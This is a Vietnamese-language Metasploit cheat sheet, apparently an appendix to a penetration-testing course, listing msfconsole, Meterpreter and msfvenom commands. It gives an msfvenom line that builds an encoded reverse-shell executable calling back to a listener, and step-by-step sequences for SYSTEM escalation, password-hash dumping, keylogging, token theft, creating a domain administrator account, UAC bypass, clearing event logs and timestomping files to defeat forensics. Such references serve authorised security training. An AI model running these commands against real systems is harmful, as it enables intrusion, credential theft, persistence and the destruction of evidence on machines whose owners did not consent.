Metasploit CheatSheet

Để thuận tiện cho việc nghiên cứu và học tập, phụ lục này liệt kê các lệnh và cú pháp được sử dụng thường xuyên nhất trong các giao diện và tiện ích khác nhau của Metasploit. Chúng tôi khuyến nghị nên đọc qua phần này để quen thuộc với một số thuật ngữ tiếng Anh cũng như tiếng Việt tương ứng của tài liệu Pentest Với Metasploit Framework 2025 !

MSFconsole

  • check: Xác định xem mục tiêu có dễ bị tấn công hay không.
  • db_connect <tên>: Tạo và kết nối với cơ sở dữ liệu (ví dụ: db_connect autopwn).
  • db_create <tên>: Tạo cơ sở dữ liệu để sử dụng với các cuộc tấn công hướng cơ sở dữ liệu (ví dụ: db_create autopwn).
  • db_destroy: Xóa cơ sở dữ liệu hiện tại.
  • db_destroy <người dùng>:<mật khẩu>@<máy chủ>:<cổng>/<cơ sở dữ liệu>: Xóa cơ sở dữ liệu bằng các tùy chọn nâng cao.
  • db_nmap: Sử dụng Nmap và đặt kết quả vào cơ sở dữ liệu; lệnh này hỗ trợ cú pháp Nmap thông thường, chẳng hạn như -sT -v -Pn.
  • exploit: Thực thi mô-đun hoặc khai thác và tấn công mục tiêu.
  • exploit -e <bộ mã hóa>: Chỉ định bộ mã hóa tải trọng sẽ sử dụng (ví dụ: exploit -e shikata_ga_nai).
  • exploit -h: Hiển thị trợ giúp cho lệnh exploit.
  • exploit -j: Chạy khai thác trong ngữ cảnh của công việc. (Điều này sẽ chạy khai thác trong nền.)
  • exploit -z: Không tương tác với phiên sau khi khai thác thành công.
  • info: Tải thông tin về một khai thác hoặc mô-đun cụ thể.
  • LHOST: Địa chỉ IP máy chủ cục bộ của bạn có thể truy cập được bởi mục tiêu; thường là địa chỉ IP công cộng khi không ở trên mạng cục bộ. Thông thường được sử dụng cho shell ngược.
  • RHOST: Máy chủ từ xa hoặc mục tiêu.
  • search <tên>: Tìm kiếm khai thác hoặc mô-đun trong Framework.
  • sessions -c <lệnh>: Thực thi lệnh trên tất cả các phiên Meterpreter đang hoạt động.
  • sessions -K: Tắt tất cả các phiên đang hoạt động.
  • sessions -l: Liệt kê các phiên khả dụng (được sử dụng khi xử lý nhiều shell).
  • sessions -l -v: Liệt kê tất cả các phiên khả dụng và hiển thị các trường dài dòng, chẳng hạn như lỗ hổng nào đã được sử dụng khi khai thác hệ thống.
  • sessions -u <sessionID>: Nâng cấp shell Win32 thông thường lên bảng điều khiển Meterpreter.
  • set <hàm>: Đặt một giá trị cụ thể (ví dụ: LHOST hoặc RHOST).
  • setg <hàm>: Đặt một giá trị cụ thể trên toàn cầu (ví dụ: LHOST hoặc RHOST).
  • set payload <tải trọng>: Chỉ định tải trọng sẽ sử dụng.
  • set target <số>: Chỉ định chỉ mục mục tiêu cụ thể nếu bạn biết hệ điều hành và gói dịch vụ.
  • show advanced: Hiển thị các tùy chọn nâng cao.
  • show auxiliary: Hiển thị tất cả các mô-đun phụ trợ trong Framework.
  • show exploits: Hiển thị tất cả các khai thác trong Framework.
  • show options: Hiển thị các tùy chọn khả dụng cho mô-đun hoặc khai thác.
  • show payloads: Hiển thị tất cả các tải trọng trong Framework.
  • show targets: Hiển thị các nền tảng được khai thác hỗ trợ.
  • use <tên>: Tải khai thác hoặc mô-đun (ví dụ: use windows/smb/psexec).

Meterpreter

  • add_group_user “Quản trị viên miền” <tên người dùng> -h <ip>: Thêm tên người dùng vào nhóm Quản trị viên miền trên mục tiêu từ xa.
  • add_user <tên người dùng> <mật khẩu> -h <ip>: Thêm người dùng trên mục tiêu từ xa.
  • background: Chạy shell Meterpreter hiện tại của bạn trong nền.
  • clearev: Xóa nhật ký sự kiện trên máy mục tiêu.
  • download <tệp>: Tải xuống tệp từ mục tiêu.
  • drop_token: Dừng mạo danh mã thông báo hiện tại.
  • execute -f cmd.exe -i: Thực thi cmd.exe và tương tác với nó.
  • execute -f cmd.exe -i -H -t: Thực thi cmd.exe với tất cả các mã thông báo khả dụng và biến nó thành một quy trình ẩn.
  • execute -f cmd.exe -i -t: Thực thi cmd.exe với tất cả các mã thông báo khả dụng.
  • getprivs: Nhận càng nhiều đặc quyền càng tốt trên mục tiêu.
  • getsystem: Cố gắng nâng cao quyền lên quyền truy cập cấp HỆ THỐNG thông qua nhiều vectơ tấn công.
  • hashdump: Dump tất cả các hash trên mục tiêu.
  • help: Mở trợ giúp sử dụng Meterpreter.
  • impersonate_token <TÊN_MIỀN>\<TÊN_NGƯỜI_DÙNG>: Mạo danh mã thông báo có sẵn trên mục tiêu.
  • keyscan_dump: Dump các khóa từ xa được chụp trên mục tiêu.
  • keyscan_start: Bắt đầu đánh hơi các phím đã nhấn trên mục tiêu từ xa.
  • keyscan_stop: Dừng đánh hơi các phím đã nhấn trên mục tiêu từ xa.
  • list_tokens -g: Liệt kê các mã thông báo khả dụng trên mục tiêu theo nhóm.
  • list_tokens -u: Liệt kê các mã thông báo khả dụng trên mục tiêu theo người dùng.
  • ls: Liệt kê các tệp và thư mục trên mục tiêu.
  • migrate <PID>: Di chuyển đến ID quy trình cụ thể; PID là ID quy trình mục tiêu thu được từ lệnh ps.
  • ps: Hiển thị tất cả các quy trình đang chạy và tài khoản nào được liên kết với từng quy trình.
  • reboot: Khởi động lại máy mục tiêu.
  • reg <lệnh>: Tương tác, tạo, xóa, truy vấn và đặt giá trị trong sổ đăng ký của mục tiêu.
  • rev2self: Quay lại người dùng ban đầu mà bạn đã sử dụng để xâm nhập mục tiêu.
  • screenshot: Chụp ảnh màn hình của mục tiêu.
  • setdesktop <số>: Chuyển sang màn hình khác dựa trên người đã đăng nhập.
  • shell: Thả vào shell tương tác với tất cả các mã thông báo khả dụng.
  • sniffer_dump <interfaceID> <pcapname>: Bắt đầu đánh hơi trên mục tiêu từ xa.
  • sniffer_interfaces: Liệt kê các giao diện khả dụng trên mục tiêu.
  • sniffer_start <interfaceID> <bộ đệm gói>: Bắt đầu đánh hơi với phạm vi cụ thể cho bộ đệm gói.
  • sniffer_stats <interfaceID>: Lấy thông tin thống kê từ giao diện mà bạn đang đánh hơi.
  • sniffer_stop <interfaceID>: Dừng sniffer.
  • steal_token <PID>: Lấy cắp các mã thông báo có sẵn cho một quy trình nhất định và mạo danh mã thông báo đó.
  • sysinfo: Hiển thị thông tin hệ thống trên mục tiêu bị xâm nhập.
  • timestomp: Thay đổi các thuộc tính của tệp, chẳng hạn như ngày tạo, như một biện pháp chống pháp y.
  • uictl enable keyboard/mouse: Kiểm soát bàn phím và/hoặc chuột.
  • upload <tệp>: Tải tệp lên mục tiêu.
  • use incognito: Tải các hàm ẩn danh được sử dụng để đánh cắp mã thông báo và mạo danh trên máy mục tiêu.
  • use priv: Tải phần mở rộng đặc quyền cho các thư viện Meterpreter mở rộng.
  • use sniffer: Tải mô-đun sniffer.

MSFvenom

Tận dụng MSFvenom, bộ tất cả trong một, để tạo và mã hóa tải trọng của bạn:

      msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=192.168.1.20 LPORT=443 -o payload.exe
    

Dòng lệnh một lần này sẽ tạo một tải trọng và tự động tạo nó ở định dạng thực thi.

Meterpreter Post Exploitation

Nâng cao quyền của bạn trên các hệ thống dựa trên Windows bằng Meterpreter:

      meterpreter > use priv
meterpreter > getsystem

Lấy cắp mã thông báo quản trị viên miền từ ID quy trình nhất định, thêm tài khoản miền và sau đó thêm mã thông báo vào nhóm Quản trị miền:

meterpreter > ps
meterpreter > steal_token <PID>
meterpreter > shell
C:\Windows\system32> net user <tên người dùng> <mật khẩu> /add /domain
C:\Windows\system32> net group "Domain Admins" <tên người dùng> /add

Dump hash mật khẩu từ cơ sở dữ liệu SAM:

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump

Bạn có thể cần di chuyển đến một quy trình đang chạy với tư cách HỆ THỐNG nếu getsystem và hashdump đưa ra ngoại lệ.

Tự động di chuyển đến một quy trình riêng biệt:

      meterpreter > run migrate
    

Chụp các phím (keylogger) đã nhấn trên máy mục tiêu từ trong một quy trình cụ thể:

meterpreter > ps
meterpreter > migrate <PID>
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Sử dụng Ẩn danh để mạo danh quản trị viên:

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > use priv
meterpreter > getsystem
meterpreter > list_tokens -u
meterpreter > impersonate_token <tên miền>\\<tên người dùng>

Thả vào lệnh shell cho phiên bảng điều khiển Meterpreter hiện tại (ví dụ load cửa sổ CMD của Windows):

      meterpreter > shell
    

Nhận GUI từ xa trên máy mục tiêu (không được dùng nữa, nhưng vẫn hoạt động):

      meterpreter > run vnc
    

Đặt bảng điều khiển Meterpreter đang chạy vào nền:

      meterpreter > background
    

Vượt qua Kiểm soát Truy cập Người dùng của Windows:

      meterpreter > run post/windows/escalate/bypassuac
    

Dump băm trên hệ thống macOS:

      meterpreter > run post/osx/gather/hashdump
    

Dump băm trên hệ thống Linux:

      meterpreter > run post/linux/gather/hashdump
    

Lưu ý các lệnh trên không phải hoạt động trên tất cả các máy Windows hay Linux mà đô khi phụ thuộc vào một số phiên bản nhất định. Khi chạy không thành công các bạn cứ chạy lại hoặc tìm hiểu thêm, nhưng không nhất thiết phải Try Hard các bạn cứ Try Smarter bằng cách hỏi AI như Gemini, DeepSeek hay Claude và ChatGPT. Tuy nhiên, khi dùng AI cũng nên có kỹ năng đừng cung cấp nhưng gì quá nhạy cảm.

Bình luận về bài viết này

Thịnh hành